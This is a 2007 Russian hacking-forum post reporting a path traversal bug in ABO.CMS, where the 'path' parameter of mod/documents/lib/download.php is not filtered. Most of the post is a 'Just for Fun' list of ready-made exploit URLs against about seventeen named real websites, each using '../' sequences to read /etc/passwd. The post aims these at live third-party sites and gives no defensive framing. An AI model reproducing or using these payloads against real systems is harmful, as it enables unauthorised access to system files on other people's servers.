13.09.2007, 17:27
|
|
Познающий
Регистрация: 15.08.2007
Сообщений: 97
Провел на форуме:
366486
Репутация:
100
|
|
Баг в ABO.CMS в mod/documents/lib/download.php переменная path не фильтруется, что позволяет скачать ЛЮБОЙ ФАЙЛ или посмотреть содержимое директорий.
Пример: http://www.stavropollada.ru/mod/documents/lib/download.php?path=index.php
--------------------------------------------------Just for Fun -----------------------------------------------
http://www.new-format.info/mod/documents/lib/download.php?path=../../../../../etc/passwd
http://club.president-centre.ru/mod/documents/lib/download.php?path=../../../../../etc/passwd
http://www.adygi.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.sov-adyg.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.i-promoter.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.pharmacor.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.konsultaudit.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.tuning72.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.netbyte.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.welloptima.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.sdexport.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.fotbal.md/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.wakeworld.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.terraprint.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.stavnews.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.compofox.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
http://www.stavropollada.ru/mod/documents/lib/download.php?path=../../../../../../etc/passwd
|
|
|